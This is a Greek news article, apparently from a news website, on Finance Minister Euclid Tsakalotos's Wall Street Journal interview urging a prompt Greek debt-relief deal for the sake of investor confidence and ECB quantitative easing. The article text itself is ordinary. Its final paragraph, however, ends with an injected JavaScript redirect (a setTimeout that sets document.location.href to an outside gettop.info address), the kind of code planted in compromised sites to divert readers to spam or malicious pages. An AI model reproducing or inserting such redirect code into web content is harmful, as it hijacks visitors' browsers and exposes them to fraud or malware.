Τσακαλώτος: Κίνδυνος αν δεν υπάρξει συμφωνία για το χρέος

0
5

 

Σε συνέντευξή του στην αμερικανική εφημερίδα Wall Street Journal, ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος κατηορεί τη Γερμανία για έλλειψη εμπιστοσύνης απέναντι στην Ελλάδα.

Επίσης, στέλνει σαφές μήνυμα στους Ευρωπαίους εταίρους μας πως αν δεν συμφωνήσουν για την αναδιάρθρωση του ελληνικού χρέους, μέσα στις επόμενες εβδομάδες, θα υπονομεύσουν τη μεγαλύτερη ευκαιρία για έξοδο της Ελλάδας από την κρίση.

Ο κ. Τσακαλώτος, στη συνέντευξή του, υπογράμμισε πως δεν υπάρχουν περιθώρια για αναβολή των κρίσιμων αποφάσεων, καθώς τυχόν μετάθεση της συζήτησης για μετά το τέλος του Μνημονίου θα στείλει αρνητικό στίγμα στους επενδυτές σχετικά με τις προοπτικές της ελληνικής οικονομίας.

Επιπλέον, προειδοποιεί πως τυχόν αναβολή για τη λήψη της απόφασης θα θέσει σε κίνδυνο τις ελπίδες της χώρας για ανάκαμψη το 2017 αλλά και ότι οι επόμενες εβδομάδες προσφέρουν μια σημαντική ευκαιρία για την Ευρωζώνη να αποδείξει ότι μπορεί να διορθώσει και όχι να αποφεύγει τα προβλήματά της.

«Αν κλωτσήσουμε παρακάτω το τενεκεδάκι και πούμε ότι «θα αποφασίσουμε σε δύο χρόνια» για το πώς θα κάνουμε το χρέος της Ελλάδας βιώσιμο, τότε οι επενδυτές θα αναβάλουν επίσης τις αποφάσεις τους για επενδύσεις στην Ελλάδα» δήλωσε ο Ελληνας ΥΠΟΙΚ που συμπλήρωσε πως οι φωνές του λαϊκισμού αυξάνονται στην Ευρώπη και η ευρωζώνη θα επιζήσει μόνο αν καταφέρει να πείσει τους ψηφοφόρους ότι μπορεί να λύσει τις προκλήσεις που αντιμετωπίζει. «Αν απλά αναβάλουμε τις πολιτικές αποφάσεις… τότε ο κόσμος θα πει ό,τι αυτό (σ.σ. η ευρωζώνη) δεν λειτουργεί».

Εξέφρασε επίσης την πίστη του ότι η Ελλάδα θα ενταχθεί μέχρι τον Μάρτιο του 2017 στο πρόγραμμα ποσοτικής χαλάρωσης της Ευρωπαϊκής Κεντρικής Τράπεζας με την εφημερίδα να σημειώνει ότι αυτό θα γίνει πιο εύκολα αν το χρέος της Ελλάδας καταστεί βιώσιμο.

Ζωτικής σημασίας χαρακτήρισε της άμεσες ενέργειες για το ζήτημα και τόνισε πως αν δεν υπάρχει συμφωνία για την ελάφρυνση χρέους τον Δεκέμβριο, αυτό θα σημαίνει ότι δεν θα υπάρξει συμμετοχή στο πρόγραμμα της ΕΚΤ μέχρι τον Μάρτιο.

«Θα είναι πολύ κοντόφθαλμη επιλογή να σταματήσει η διαδικασία που μας βγάλει από το πρόγραμμα, εξέλιξη που είναι ορατή» προσθέτει ο ΥΠΟΙΚ.

Απορρίπτει τον ισχυρισμό ότι το Βερολίνο αποφεύγει το θέμα του ελληνικού χρέους λόγω των γερμανικών εκλογών το 2017. Η ελάφρυνση χρέους δεν μεταφράζεται σε σημαντικό κόστος για τον μέσο ψηφοφόρο στο Αμβούργο υποστηρίζει o κ. Τσακαλώτος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here